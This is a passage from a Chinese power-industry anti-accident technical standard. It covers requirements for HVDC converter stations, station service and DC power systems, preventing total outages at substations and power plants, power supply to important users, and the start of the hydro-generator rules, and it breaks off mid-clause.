192 21.1.11 换流阀外水冷系统缓冲水池应配置两套水位监测装置,并设置高低 水位报警。喷淋泵首次启动应检测缓冲水池水位,水位低时禁止启动。喷淋泵运 行时,出现缓冲水池水位低报警时禁止停运喷淋泵。 21.1.12 换流阀外风冷系统风扇电机、换流阀外水冷系统风扇电动机及其接 线盒应采取防潮防锈措施。 21.1.13 在寒冷地区,阀外冷系统冷却器应装设于防冻棚内,配置足够裕度 的暖风机,且具备低温自动启动、手动启动功能,避免低温天气下阀冷系统设备 结冰或冻裂。 21.1.14 阀厅设计应根据当地历史气候记录,适当提高阀厅屋顶的设计与施 工标准,防止大风掀翻屋顶,保证阀厅的防雨、防尘性能。 21.1.15 阀厅屋顶及室内巡视通道设计应考虑可靠的安全措施,避免人员跌 落。 21.1.16 运行期间应记录和分析阀控系统的报警信息,掌握晶闸管、光纤、 板卡的运行状况。当单阀内晶闸管故障数达到跳闸值-1时,应申请停运直流系统 并进行全面检查,更换故障元件,查明故障原因后方可再投入运行,避免发生击 穿或误闭锁。 21.1.17 运行期间应定期对换流阀设备进行红外测温,必要时进行紫外检测, 出现过热、弧光等问题时应密切跟踪,必要时申请停运直流系统处理。若发现火 情,应立即停运直流系统,采取灭火措施,避免事故扩大。 21.1.18 检修期间应对内冷水系统水管进行检查,发现水管接头松动、磨损、 渗漏等异常要及时分析处理。 21.1.19 晶闸管换流阀运行15年后,每3年应随机抽取部分晶闸管进行全面检 测和状态评估。 21.1.20 新建换流站附近应有可靠水源,其水量和水质应满足换流站消防事 故情况下救援、应急抢修需要。 21.2 防止换流变压器(油浸式平波电抗器)事故 防止换流变压器(油浸式平波电抗器)事故参考“防止大型变压器损坏和互 感器事故”措施执行,还应注意以下方面。 21.2.1 换流变压器及油浸式平波电抗器阀侧套管不宜采用充油套管。换流变 193 压器及油浸式平波电抗器穿墙套管的封堵应使用非导磁材料。换流变压器及油浸 式平波电抗器阀侧套管类新产品应充分论证,并严格通过试验考核后再在直流工 程中使用。 21.2.2 换流变压器及油浸式平波电抗器应配置带胶囊的储油柜,储油柜容积 应不小于本体油量的8~10%,胶囊宜采用丁腈橡胶材质。 21.2.3 换流变压器保护应采用三重化或双重化配置。采用三重化配置的按 “三取二”逻辑出口,采用双重化配置的每套保护装置中应采用“启动+动作”逻 辑。新建和改建工程换流变压器非电量保护跳闸触点应满足非电量保护三重化配 置的要求,按照“三取二”原则出口。 21.2.4 换流变压器回路电流互感器、电压互感器二次绕组应满足保护冗余配 置的要求。 21.2.5 换流变压器、油浸式平波电抗器户外布置时,瓦斯继电器、油流速动 继电器、压力释放阀等非电量保护装置及表计应加装防雨罩并采取措施防止带电 运行过程中防雨罩损伤电缆;非电量保护装置接线盒的引出电缆应以垂直U型方 式接入继电器接线盒,避免高挂低用;电缆护套应具有防进水、防积水保护措施, 防止雨水顺电缆倒灌。换流变压器分接开关不应配置浮球式的油流继电器。 21.2.6 采用六氟化硫气体绝缘的换流变压器及油浸式平波电抗器套管、穿墙 套管、直流分压器等应配置六氟化硫压力或密度继电器,并分级设置报警和跳闸。 作用于跳闸的非电量保护继电器应设置三副独立的跳闸接点,以便在非电量元件 采用“三取二”原则出口,三个开入回路要独立,不允许多副跳闸接点并联上送, 三取二出口判断逻辑装置及其电源应冗余配置。 21.2.7 换流变压器、油浸式平波电抗器故障跳闸后,应自动切除潜油泵。 21.2.8 换流变压器、油浸式平波电抗器就地控制柜、冷却器控制柜和有载分 接开关机构箱应满足电子元器件长期工作环境条件要求且便于维护,控制柜内直 流工作电源与直流信号电源应独立。 21.2.9 换流变压器铁芯及夹件引出线采用不同标识,并引出至运行中便于测 量的位置。 21.2.10 换流变压器及油浸式平波电抗器应配置成熟可靠的在线监测装置, 并将在线监测信息送至后台集中分析。 194 21.2.11 运行期间,换流变压器及油浸式平波电抗器的重瓦斯保护以及换流 变压器有载分接开关油流保护应投跳闸。 21.2.12 换流变压器、油浸式平波电抗器应配置油中溶解气体在线监测装置。 油中溶解气体在线监测装置采购时应满足入网检测要求;对基建和改造安装的油 中溶解气体在线监测装置,到货后应做好安装、验收、运维、检验等工作。 21.2.13 定期对换流变压器及油浸式平波电抗器进行红外测温,套管本体和 端子导体的温度(精确测温)不应有跃变;相邻相间套管本体和端子的导体温度 (精确测温)不应有明显差异。 21.2.14 换流变压器分接开关档位不一致时,首先通过远方手动操作等方式 将异常相换流变压器分接开关档位调至与正常相档位相同。异常相分接开关无法 调节且与正常相档位差达到2档及以上,可调整正常相分接开关档位与异常相档 位相差1档,故障处理过程中应避免保护动作,必要时申请换流变压器停运。 21.2.15 换流变压器和油浸式平波电抗器投运前应检查套管末屏端子接地良 好。若需更换末屏分压器,应确认分压器电容与套管主电容满足匹配关系。 21.2.16 平波电抗器瓦斯继电器与油枕相连的波纹联管应为刚性连接,降低 瓦斯继电器振动加速度,避免共振。 21.3 防止失去站用电事故 21.3.1 换流站的站用电源设计应配置三路独立、可靠电源,其中至少有一回 应从站内交流系统引接。若三路电源中有两路取自站外,则两路站外电源应取自 不同电源点,且为专线供电,不得采用T接、迂回供电和同杆架设方式。 21.3.2 站用电系统10kV母线和400V母线均应配置备用电源自动投切功能, 并与阀外冷系统电源切换装置的动作时间逐级配合,确保不因站用电源切换导致 单、双极闭锁。 21.3.3 换流阀内冷却系统两台主泵应冗余配置、主泵电源应相互独立并取自 不同的400V母线段。换流阀外冷却系统由两路400V电源经电源切换装置分塔分 段供电。换流变压器冷却系统由两路400V电源经电源切换装置供电。 21.3.4 站用电系统及阀冷却系统应在系统调试前完成各级站用电源切换、定 值检定、内冷水主泵切换试验。 21.3.5 直流换流站直流电源应采用三台充电、浮充电装置,两组蓄电池组、 195 三条直流配电母线(直流a、b和c母线)的供电方式。a、b两条直流母线为 电源双重化配置的设备提供工作电源,c母线为电源非双重化的设备提供工作电 源。双重化配置的二次设备的信号电源应相互独立,分别取自直流母线a段或者 b段。 21.3.6 当失去一路站用电源时应尽快恢复其供电。当仅剩一路电源时,换流 站应立即向调度机构汇报。 21.4 防止外绝缘事故 21.4.1 在设计阶段,应充分考虑当地污秽等级,结合直流设备易积污的特点, 参考当地长期运行经验及环境污染发展情况,并进行专题研究来设计直流场设备 外绝缘强度。 21.4.2 对于新电压等级的直流工程,应通过绝缘配合计算合理选择避雷器参 数。 21.4.3 密切跟踪换流站周围污染源及污秽度的变化情况,加强环境气象监 测,应定期开展污秽度及污闪风险评估,据此及时采取相应措施使设备爬电比距 与所处地区的污秽等级相适应。 21.4.4 每年应对已喷涂防污闪涂料的直流场设备绝缘子进行憎水性检查,及 时对破损或失效的涂层进行重新喷涂。若绝缘子的憎水性下降到3级,应考虑重 新喷涂。 21.4.5 定期对直流场设备进行红外测温,建立红外图谱档案,进行纵、横向 温差比较,便于及时发现隐患并处理 21.4.6 恶劣天气下加强设备的巡视,检查跟踪设备放电情况。发现设备出现 异常放电后,及时汇报,必要时申请降压运行或停电处理。若发现交流滤波器开 关有放电现象,应申请调度暂停功率调整,减少交流滤波器开关分合操作。 21.5 防止直流控制保护设备事故 21.5.1 直流控制系统应采用完全冗余的双重化配置。每套控制系统应有独立 的硬件设备,包括主机、板卡、电源、输入输出回路和控制软件,每极各层控制 设备间、极间不应有公用的输入/输出(I/O)设备。在两套控制系统均可用的情 况下,一套控制系统任一环节故障时,应不影响另一套系统的运行,也不应导致 直流闭锁。 196 21.5.2 直流保护应采用分区设置,各区域交界面应相互重叠,防止出现保护 死区。每一区域均应配置主、后备保护。 21.5.3 采用双重化配置的直流保护(含换流变保护及交流滤波器保护),每 套保护应采用“启动+动作”逻辑,启动和动作元件及回路应完全独立。采用三重 化配置的直流保护(含换流变压器保护),每套保护测量回路应独立,应按“三 取二”逻辑出口,任一“三取二”模块故障也不应导致保护误动和拒动。电子式电 流互感器的远端模块至保护装置的回路应独立,纯光纤式电流互感器测量光纤及 电磁式电流互感器二次绕组至保护装置的回路应独立。 21.5.4 直流控制保护系统应具备完善、全面的自检功能,自检到主机、板卡、 总线、测量等故障时应根据故障级别进行报警、系统切换、退出运行、停运直流 系统等操作,且给出准确的故障信息。直流保护系统检测到测量异常时应可靠退 出相关保护功能,测量恢复正常后应确保保护出口复归再投入相关保护功能,防 止保护不正确动作。 21.5.5 直流控制保护系统的参数应由成套设计单位通过系统仿真计算、设备 能力校核给出设计值,经过二次设备联调试验验证。当电网结构发生变化时,成 套设计单位应对控制保护系统参数的适应性进行校核。 21.5.6 直流光电流互感器二次回路应简洁、可靠,光电流互感器输出的数字 量信号宜直接输入直流控制保护系统,避免经多级数模、模数转化后接入。 21.5.7 直流控制保护装置安装应在控制室、继电器室等建筑物土建施工完成 并且联合验收合格后进行,不得与土建施工同时进行。在设备室达到要求前,不 应开展控制保护设备的安装、接线和调试;在设备室内开展可能影响洁净度的工 作时,须采用完好塑料罩等做好设备的密封防护措施。当施工造成设备内部受到 污秽、粉尘污染时,应返厂清洗并经测试正常后方可使用;如污染导致设备运行 异常,应整体更换设备。 21.5.8 换流站所有跳闸出口触点均应采用常开触点。 21.5.9 换流站户外端子箱、接线盒、插头等防护等级(IP)最低应达到IP55。 21.5.10 现场注意控制直流控制保护系统运行环境,监视主机板卡的运行温 度、清洁度,运行条件较差的控制保护设备可加装小室、空调或空气净化器。 21.5.11 加强换流站直流控制保护系统软硬件管理,直流控制保护系统的软 197 件、硬件及定值的修改须履行软硬件修改审批手续,经主管部门的同意后方可执 行。 21.5.12 一极运行一极检修(调试)时,检修(调试)极中性隔离开关应处 于分闸状态,禁止在该检修极中性隔离开关和双极公共区域设备上开展工作。 21.5.13 直流控制保护系统故障处理完毕后,应检查并确认无报警、无保护 出口后才可切换到运行状态。 21.5.14 开展直流控制保护系统主机板卡故障率统计分析,对突出的问题要 及时联系厂家分析处理。 22 防止发电厂、变电站全停及重要电力用户停电事故的 重点要求 22.1 防止发电厂全停事故 22.1.1 厂用电系统运行方式和设备管理。 22.1.1.1 根据电厂运行实际情况,制订合理的全厂公用系统运行方式,防止 部分公用系统故障导致全厂停电。重要公用系统在非标准运行方式时,应制定监 控措施,保障运行正常。 22.1.1.2 重视机组厂用电切换装置的合理配置及日常维护,确保系统电压、 频率出现较大波动时,具有可靠的保厂用电源技术措施。 22.1.1.3 带直配电负荷电厂的机组应设置低频率、低电压解列装置,确保机 组在发生系统故障时,解列部分机组后能单独带厂用电和直配负荷运行。 22.1.2 自动准同期装置和厂用电切换装置应单独配置。 22.1.3 在汽轮机油系统间加装能隔离开断的设施并设置备用冷油器,定期化 验油质,防止因冷油器漏水导致油质老化,造成轴瓦过热熔化被迫停机。 22.1.4 重要辅机(如送引风、给水泵、循环水泵等)电动机事故控制按钮应 加装保护罩,防止误碰造成停机事故。 22.1.5 加强蓄电池和直流系统(含逆变电源)及柴油发电机组的运行维护, 确保主机交直流润滑油泵和主要辅机油泵供电可靠。直流润滑油泵的直流电源系 统应有足够的容量,其各级空气断路器(保险)应合理配置,并有级差配合,防 止故障时熔断器熔断或空气断路器越级跳闸使直流润滑油泵失去电源。 198 22.1.6 积极开展汽轮发电机组小岛试验工作,以保证机组与电网解列后的厂 用电源。 22.1.7 应合理制定机组检修计划,做好保单机运行安全措施,防止单机运行 时机组非停。用于发电机机组控制用的功率采样装置宜采用微机式发电机智能变 送装置。 22.1.8 加强海洋环境及海洋生物监测、预警,制定应急预案和采取措施避免 灾害发生时对机组冷源系统的危害,造成停机事故。 22.1.9 电厂监控系统、调度自动化系统等重要设备应选择不间断电源供电, 现地控制单元(Local Control Unit)电源应采用冗余配置,其中至少一路为直流 电源。 22.1.10 厂高变高压侧断路器的控制及保护电源应分母线设置,禁止接入同 一母线,防止该段直流母线故障造成断路器同时跳闸。 22.1.11 燃气关断阀(Emergency Shut Down Valve,ESD 阀)电源回路应可 靠。ESD 阀采用双电源切换开关供电的,其二路电源应独立,应能保证切换过 程中,电磁阀不误动;应结合检修开展 ESD 阀双电源切换试验并进行录波;对 达不到 ESD 阀供电要求的双电源切换装置应及时进行改造。ESD 阀采用 UPS 自 带蓄电池供电的,应定期开展自带蓄电池核对性放电试验。宜配置冗余的电磁阀 控制 ESD 阀,避免单电磁阀误动作引发 ESD 阀动作。 22.2 防止变电站和发电厂升压站全停事故 22.2.1 新建 220kV 及以上电压等级枢纽变电站的架空电源进线不应全部架 设在同一杆塔上,220kV 及以上电压等级电缆电源进线不应敷设在同一排管或电 缆沟内(进站隧道除外),以防止故障导致变电站全停。已建成在运的应逐步改 造达到此要求。 22.2.2 新建 220kV 及以上电压等级双母分段接线方式的气体绝缘金属封闭 开关设备(GIS),当本期进出线元件数达到 4 回及以上时,投产时应将母联及 分段间隔相关一、二次设备全部投运。 22.2.3 设备改扩建时,一次设备安装调试全部结束并通过验收后,方可与运 行设备连接。 22.2.4 完善变电站一、二次设备 199 22.2.4.1 省级主电网枢纽变电站在非过渡阶段应有不同电源点的三条及以 上输电通道,在站内部分母线或一条输电通道检修情况下,发生 N-1 故障时不应 出现变电站全停的情况;特别重要的枢纽变电站在非过渡阶段应有不同电源点的 三条以上输电通道,在站内部分母线或一条输电通道检修情况下,发生 N-2 故障 时不应出现变电站全停的情况。 22.2.4.2 枢纽变电站(升压站)应采用双母分段接线或 3/2 接线方式,根据 电网结构的变化,应满足变电站设备的短路容量约束。当设备额定短路电流不满 足要求时,应及时采取设备改造、限流或调整运行方式等措施。 22.2.4.3 双母线、单母线或桥形接线中,GIS 母线避雷器和电压互感器应设 置独立的隔离开关。3/2 断路器接线中,GIS 母线避雷器和电压互感器不应装设 隔离开关,宜设置可拆卸导体作为隔离装置。可拆卸导体应设置于独立的气室内。 架空进线的 GIS 线路间隔的避雷器和线路电压互感器宜采用外置结构。 22.2.4.4 330kV 及以上变电站和地下 220kV 变电站的备用站用变电源不能 由该站作为单一电源的区域供电。 22.2.4.5 严格按照有关标准进行断路器、隔离开关、母线等设备选型,加强 对变电站断路器开断容量的校核、隔离开关与母线额定短时耐受电流及额定峰值 耐受电流校核。对短路容量增大后造成断路器开断容量不满足要求的断路器要及 时进行改造,在改造以前应加强对设备的运行监视和试验。 22.2.4.6 为提高继电保护的可靠性,传输两套独立的继电保护通道相对应的 电力通信设备应为两套完整独立的、两种不同路由的通信系统,其告警信息应接 入相关监控系统。 22.2.4.7 在确定各类保护装置电流互感器二次绕组分配时,应考虑消除保护 死区。分配接入保护的互感器二次绕组时,还应特别注意避免运行中一套保护退 出时可能出现的电流互感器内部故障死区问题。 22.2.4.8 继电保护及安全自动装置应选用抗干扰能力符合有关规程规定的 产品,在保护装置内,直跳回路开入量应设置必要的延时防抖回路,防止由于开 入量的短暂干扰造成保护装置误动出口。 22.2.4.9 对双母线接线方式下间隔内一组母线侧隔离开关检修时,应将另一 组母线侧隔离开关的电机电源及控制电源断开。 200 22.2.4.10 双母线接线方式下,一组母线电压互感器退出运行时,应加强运 行电压互感器的巡视和红外测温,避免故障导致母线全停。 22.2.4.11 定期对变电站(升压站)内及周边飘浮物、塑料大棚、彩钢板建 筑、风筝及高大树木等进行清理,大风前后应进行专项检查,防止异物漂浮造成 设备短路。 22.2.5 防止污闪造成的变电站和发电厂升压站全停。 22.2.5.1 对于伞形合理、爬距不低于三级污区要求的瓷绝缘子,可根据当地 运行经验,采取绝缘子表面涂覆防污闪涂料的补充措施。其中防污闪涂料的综合 性能应不低于线路复合绝缘子所用高温硫化硅橡胶的性能要求。 22.2.5.2 硅橡胶复合绝缘子(含复合套管、复合支柱绝缘子等)的硅橡胶材 料综合性能应不低于线路复合绝缘子所用高温硫化硅橡胶的性能要求;树脂浸渍 的玻璃纤维芯棒或玻璃纤维筒应参考线路复合绝缘子芯棒材料的水扩散试验进 行检验。 22.2.5.3 对于易发生粘雪、覆冰的区域,支柱绝缘子及套管在采用大小相间 的防污伞形结构基础上,每隔一段距离应采用一个超大直径伞裙(可采用硅橡胶 增爬裙),以防止绝缘子上出现连续粘雪、覆冰。110kV、220kV 及 500kV 绝缘 子串宜分别安装 3、6 及 9~12 片超大直径伞裙。支柱绝缘子所用伞裙伸出长度 8~10cm;套管等其它直径较粗的绝缘子所用伞裙伸出长度 12~15cm。 22.2.5.4 变电站、升压站带电水冲洗工作必须保证水质要求,并严格按照《电 力设备带电水冲洗导则》(GB 13395)规范操作,母线冲洗时要投入可靠的母 差保护。 22.2.6 直流电源系统配置 22.2.6.1 升压站电压等级在 220kV 及以上时,发电机组用直流电源系统与升 压站用直流电源系统必须相互独立。 22.2.6.2 220kV 及以上电压等级的新建变电站通信电源应双重化配置,满 足“双设备、双路由、双电源”的要求。 22.2.6.3 变电站、发电厂升压站直流系统配置应充分考虑设备检修时的冗 余,330kV 及以上电压等级变电站、发电厂升压站及重要的 220kV 变电站、发 电厂升压站应采用 3 台充电、浮充电装置,两组蓄电池组的供电方式。每组蓄电 201 池和充电机应分别接于一段直流母线上,第三台充电装置(备用充电装置)可在 两段母线之间切换,任一工作充电装置退出运行时,手动投入第三台充电装置。 变电站、发电厂升压站直流电源供电质量应满足微机保护运行要求。 22.2.6.4 火电厂动力、UPS 及应急电源用直流系统,按主控单元,应采用 3 台充电、浮充电装置,两组蓄电池组的供电方式。每组蓄电池和充电机应分别接 于一段直流母线上,第三台充电装置(备用充电装置)可在两段母线之间切换, 任一工作充电装置退出运行时,手动投入第三台充电装置。其标称电压应采用 220V,直流电源的供电质量应满足动力、UPS 及应急电源的运行要求。 22.2.6.5 火电厂控制、保护用直流电源系统,按单台发电机组,应采用 2 台 充电、浮充电装置,两组蓄电池组的供电方式。每组蓄电池和充电机应分别接于 一段直流母线上。每一段母线各带一台发电机组的控制、保护用负荷。直流电源 的供电质量应满足控制、保护负荷的运行要求。 22.2.6.6 采用两组蓄电池供电的直流电源系统,每组蓄电池组的容量,应能 满足同时带两段直流母线负荷的运行要求,且满足在正常运行中两段母线切换时 不中断供电的要求。在切换过程中,两组蓄电池应满足标称电压相同,电压差小 于规定值,且直流电源系统处于正常运行状态,允许短时并联运行。禁止在两个 系统都存在接地故障情况下进行切换。 22.2.6.7 直流电源系统馈出网络应采用集中辐射或分层辐射供电方式,严禁 采用环状供电方式。断路器储能电源、隔离开关电机电源、35(10)kV 开关柜 内顶部可采用每段母线辐射供电方式。 22.2.6.8 新建或改造变电站直流电源系统对负载供电,应采用分层辐射供电 方式,按电压等级设置分电屏,不应采用直流小母线供电方式。 22.2.6.9 发电机组直流电源系统对负载供电,应按所供电设备所在段设置分 电屏,不应采用直流小母线供电方式。 22.2.6.10 直流母线采用单母线供电时,应采用不同位置的直流开关,分别 带控制用负荷和保护用负荷。 22.2.6.11 新建或改造后的直流电源系统应具有直流电源系统母线及馈线接 地、蓄电池接地、瞬时接地、交流窜入和直流互窜等绝缘故障的测量、记录、选 线、报警及录波功能,不应采用交流注入法测量直流电源系统绝缘状态,新建或 202 改造后的直流电源系统应具有蓄电池内阻监测功能,不满足要求的应逐步进行改 造。 22.2.6.12 直流电源系统除蓄电池组出口保护电器外,应使用直流专用断路 器。蓄电池组出口回路保护用电器宜采用熔断器,也可采用具有选择性保护的直 流断路器。 22.2.6.13 直流高频模块和通信电源模块应加装独立进线断路器。 22.2.6.14 加强直流断路器上、下级之间的级差配合的运行维护管理。新建 或改造的发电机组、变电站、升压站的直流电源系统,设计资料中应提供全站直 流电源系统上下级差配置图和各级断路器(熔断器)级差配合参数。投运前,应 进行直流断路器的级差配合试验。 22.2.6.15 直流电源系统的电缆应采用阻燃电缆,两组蓄电池的电缆应分别 铺设在各自独立的通道内,避免与交流电缆并排铺设,在穿越电缆竖井时,两组 蓄电池电缆应分别加穿金属套管。对不满足要求的应采取防火隔离措施。 22.2.6.16 一组蓄电池配一套充电装置或两组蓄电池配两套充电装置的直流 电源系统,每套充电装置应采用两路交流电源输入,且具备自动投切功能。 22.2.6.17 新安装的阀控密封蓄电池组,应进行全核对性放电试验。以后每 隔 2 年进行一次核对性放电试验。运行满 4 年以后的蓄电池组,每年做一次核对 性放电试验。对容量不合格的蓄电池组应立即更换。 22.2.6.18 浮充电运行的蓄电池组,除制造厂有特殊规定外,应采用恒压方 式进行浮充电。浮充电时,严格控制单体电池的浮充电压上、下限,每个月至少 一次对蓄电池组所有的单体浮充端电压进行测量记录,防止蓄电池因充电电压过 高或过低而损坏。 22.2.6.19 严防交流窜入直流故障。变电站内端子箱、机构箱、智能控制柜、 汇控柜等屏柜内的交直流接线,不应接在同一段端子排上。严禁从控制箱、端子 箱内引接检修电源。控制箱、端子箱内要装设加热驱潮装置并保证运行状态良好, 防止受潮、凝露引发直流接地、交窜直等故障。试验电源屏交流电源与直流电源 应分层布置。 22.2.6.20 及时消除直流电源系统接地缺陷,当同一段直流母线出现两点同 时接地时,应立即采取措施消除,避免同一直流母线两点接地造成继电保护、开 203 关误动或拒动故障。当出现直流电源系统一点接地时,应及时消除。 22.2.6.21 充电、浮充电装置在检修结束恢复运行时,应先合交流侧开关, 再带直流负荷。 22.2.7 站用电系统配置 22.2.7.1 设计资料中应提供全站交流电源系统上下级差配置图和各级断路 器(熔断器)级差配合参数、直流断路器灵敏度和选择性计算校核资料,选择性 不满足要求的,主馈线屏、分电屏应选用三段式直流断路器。新建变电站交流电 源系统在投运前,应完成断路器上下级级差配合试验,核对熔断器级差参数,合 格后方可投运。 22.2.7.2 新建或改造的站用电系统,高压侧有继电保护装置的,应加强对站 用变高压侧保护装置定值整定,避免站用变高压侧保护装置定值与站用电屏断路 器自身保护定值不匹配,导致越级跳闸事件。 22.2.7.3 加强站用电高压侧保护装置、站用电屏总路和馈线断路器保护功能 校验,并在设计资料中提供灵敏度校验计算报告,确保短路、过载、接地故障时, 各级断路器能正确动作,防止站用电故障越级动作,确保站用电系统的稳定运行。 22.2.7.4 变电站采用交流供电的通信设备、自动化设备、防误主机、火灾报 警主机、固定灭火控制主机交流电源应取自站用交流不间断电源系统。 22.2.7.5 110(66)kV 及以上电压等级变电站应至少配置两路站用电源。 装有两台及以上主变压器的 330kV 及以上变电站和地下 220kV 变电站,应配置 三路站用电源。站外电源应独立可靠,不应取自本站作为唯一供电电源的变电站。 22.2.7.6 当任意一台站用变压器退出时,备用站用变压器应能自动切换至失 电的工作母线段,继续供电。 22.2.7.7 站用交流母线分段的,每套站用交流不间断电源装置的交流主输 入、交流旁路输入电源应取自不同段的站用交流母线。两套配置的站用交流不间 断电源装置交流主输入应取自不同段的站用交流母线,直流输入应取自不同段的 直流电源母线。 22.2.7.8 双机单母线分段接线方式的站用交流不间断电源装置,分段断路器 应具有防止两段母线带电时闭合分段断路器的防误操作措施。手动维修旁路断路 器应具有防误操作的闭锁措施。 204 22.2.7.9 站用交流电源系统的母线安装在一个柜架单元内,主母线与其他元 件之间的导体布置应采取避免相间或相对地短路的措施,配电屏间禁止使用裸导 体进行连接,母线应有绝缘护套。 22.2.7.10 两套分列运行的站用交流电源系统,电源环路中应设置明显断开 点,禁止合环运行。 22.2.7.11 正常运行中,禁止两台不具备并联运行功能的站用交流不间断电 源装置并列运行。 22.2.8 变电站、升压站的运行、检修管理 22.2.8.1 加强防误闭锁装置的运行和维护管理,确保防误闭锁装置正常运 行。闭锁装置的解锁钥匙必须按照有关规定严格管理。 22.2.8.2 对于双母线接线方式的变电站、升压站,在一条母线停电检修及恢 复送电过程中,必须做好各项安全措施。对检修或事故跳闸停电的母线进行试送 电时,具备空余线路且线路后备保护满足充电需求时应首先考虑用外来电源送 电。 22.2.8.3 隔离开关、硬母线支柱绝缘子,应选用高强度支柱绝缘子,定期对 枢纽变电站、升压站支柱绝缘子,特别是母线支柱绝缘子、隔离开关支柱绝缘子 进行检查,防止绝缘子断裂引起母线事故。 22.2.8.4 根据电网容量和网架结构变化定期校验变电站短路容量,当设备额 定短路电流不满足要求时,应及时采取设备改造、限流或调整运行方式等措施。 22.2.8.5 无专用开关的线路高压电抗器,电抗器运行时应投入线路远跳保 护,远跳保护退出时电抗器应停运。 22.2.8.6 加强对变电站一次设备的检查,加强对套管及其引线接头、隔离开 关触头、引线接头的温度监测。 22.2.8.7 定期对隔离开关、母线支柱绝缘子进行超声波探伤,及时发现缺陷 并处理,避免发生支柱绝缘子断裂。母线至 PT、避雷器引下线金具要定期检查 是否有裂纹。 22.3 防止重要电力用户停电事故 22.3.1 重要电力用户入网管理 22.3.1.1 供电企业应制定重要电力用户入网管理制度,制度应包括对重要电 205 力用户在规划设计、接线方式、电源配置、短路容量、电流开断能力、设备运行 环境条件、安全性等各方面的要求。 22.3.1.2 供电企业对属于非线性、不对称负荷性质的重要电力用户应进行电 能质量测试评估,根据评估结果,指导督促重要电力用户制订相应电能质量治理 方案并进行评审,保证其负荷产生的谐波成分及负序分量不对电网造成污染,不 对供电企业及其自身供用电设备造成影响。 22.3.1.3 供电企业在与重要电力用户签订供用电协议时,应按照国家法律法 规、政策及电力行业标准,明确重要电力用户供电电源、自备应急电源及非电保 安措施配置要求,明确供电电源及用电负荷电能质量标准,明确双方在电气设备 安全运行管理中的权利义务及发生用电事故时的法律责任,明确重要电力用户按 照电力行业技术监督标准,开展技术监督工作。供电企业应指导督促重要电力用 户应制订停电事故应急预案。 22.3.2 合理配置供电电源点 22.3.2.1 特级重要电力用户应采用多电源供电,多电源是指为同一用户负荷 供电的两回以上供电线路,至少有两回供电线路分别来自不同变电站。。 22.3.2.2 一级重要电力用户至少应采用双电源供电,双电源是指为同一用户 负荷供电的两回供电线路,两回供电线路可以分别来自两个不同的变电站(开闭 所),或来自不同电源进线的同一变电站(开闭所)内两段母线。 22.3.2.3 二级重要电力用户至少应采用双回路供电,双回路是指为同一用户 负荷供电的两回供电线路,两回供电线路可以来自同一变电站的同一母线段。 22.3.2.4 临时性重要电力用户按照供电负荷的重要性,在条件允许情况下, 可以通过临时敷设线路或移动发电设备等方式满足双回路或两路以上电源供电 条件。 22.3.2.5 重要电力电力用户供电电源的切换时间和切换方式要满足国家相 关标准中规定的允许中断供电时间的要求。 22.3.2.6 对电能质量有特殊需求的重要电力用户,供电企业应指导重要电力 用户自行加装电能质量治理装置。 22.3.3 重要电力用户供电的输变电设备运行维护 22.3.3.1 供电企业应根据国家相关标准、电力行业标准,针对重要电力用户 206 供电的输变电设备制定相应的运行规范、检修规范、反事故措施, 22.3.3.2 根据对重要电力用户供电的输变电设备实际运行情况,缩短设备巡 视周期、设备检修周期。 22.3.3.3 汛期来临前应检查重要电力用户配电设备设施的周边环境、排水设 施状况,保证在恶劣天气情况下顺利排水。 22.3.3.4 对于重要电力电力用户地下或低洼地区的配电设备设施,供电企业 应指导督促其具有可靠的防范水淹及倒灌措施。 22.3.4 重要电力用户自备应急电源管理 重要电力用户自备应急电源应在供电企业登记备案,供电企业应对重要电力 用户配置的自备应急电源进行定期检查,重点检查重要电力用户自备应急电源配 置使用应符合以下要求: 22.3.4.1 重 要 电 力 用 户 自 备 应 急 电 源 配 置 容 量 标 准 应 达 到 保 安 负 荷 的 120%。 22.3.4.2 重要电力用户自备应急电源启动时间应满足安全要求。 22.3.4.3 重要电力用户自备应急电源与电网电源之间应装设可靠的电气或 机械锁装置,防止倒送电。 22.3.4.4 重要电力用户自备应急电源设备要符合国家有关安全、消防、节能、 环保等技术规范和标准要求。 22.3.4.5 重要电力用户新装自备应急电源投入切换装置技术方案要符合国 家有关标准和所接入电力系统安全要求。 22.3.4.6 重要电力用户应按照国家和电力行业有关规程、规范和标准的要 求,对自备应急电源定期进行安全检查、预防性试验、启机试验和切换装置的切 换试验。 22.3.4.7 重要电力用户不应自行变更自备应急电源接线方式。 22.3.4.8 重要电力用户不应自行拆除自备应急电源的闭锁装置或者使其失 效。 22.3.4.9 供电企业应给予指导,确保重要电力用户的自备应急电源处于良好 的运行状态,发生故障后应尽快修复,并应具备外部应急电源接入条件,配置外 部应急电源接入装置,便于外部电源接入,确保应急情况下保障重要负荷不失电。 207 22.3.4.10 重要电力用户严禁擅自将自备应急电源转供其他用户。 22.3.5 督促重要电力用户整改安全隐患 22.3.5.1 供电企业生产部门、调度部门应建立重要电力用户电网侧安全隐患 排查机制,定期(至少半年一次)对重要电力用户供电情况进行排查,对发现的 电网责任安全隐患进行整改。 22.3.5.2 供电企业应督促重要电力用户编制反事故预案,定期开展反事故演 习,每 3 年至少开展 1 次电网和重要用户端的联合演练,并组织演练评估。 22.3.5.3 发现属于用户责任的用电安全隐患,供电企业用电检查人员应以书 面形式告知用户,积极督促用户整改,定期将重要用电安全隐患向政府主管部门 沟通汇报,争取政府支持,进行监督管理,建立政府主导、用户落实整改、供电 企业提供技术指导的长效工作机制。 22.4 反恐怖防范和防止网络攻击导致停电事故 22.4.1 电力企业和重要电力用户应贯彻落实电力系统治安反恐防范的重点 目标和重点部位、重点目标等级和防范级别、总体防范要求、常态三级防范要求、 常态二级防范要求、常态一级防范要求、非常态防范要求和安全防范系统技术要 求。 22.4.2 电力企业应落实《电力行业网络安全管理办法》《电力监控系统安全 防护规定》《电力行业网络安全等级保护管理办法》等网络安全工作要求,防止 网络攻击事件导致的发电厂、变电站全停和重要电力用户停电事故。 23 防止水轮发电机组(含抽水蓄能机组)事故的重点要求 23.1 防止机组飞逸 23.1.1 调速器设置交直流两套电源装置,互为备用,故障时自动转换并发出 故障信号。 23.1.2 调速器控制器应冗余配置,重要控制信号应至少设置2路,重要控制 信号丢失后系统控制性能应满足相关标准要求。 23.1.3 机组调速系统安装、更新改造及大修后应进行水轮机调节系统静态模 拟试验、动态特性试验和导叶关闭规律等试验,各项指标合格方可投入运行。 23.1.4 新机组、改造后机组投运前或机组大修后应通过甩负荷和过速试验, 208 验证水压上升率和转速上升率符合设计要求,过速整定值校验合格。 23.1.5 新投产机组或机组大修后,应结合机组甩负荷试验时转速升高值,核 对水轮机导叶关闭规律是否符合设计要求,并通过合理设置关闭时间或采用分段 关闭,确保水压上升值不超过规定值。 23.1.6 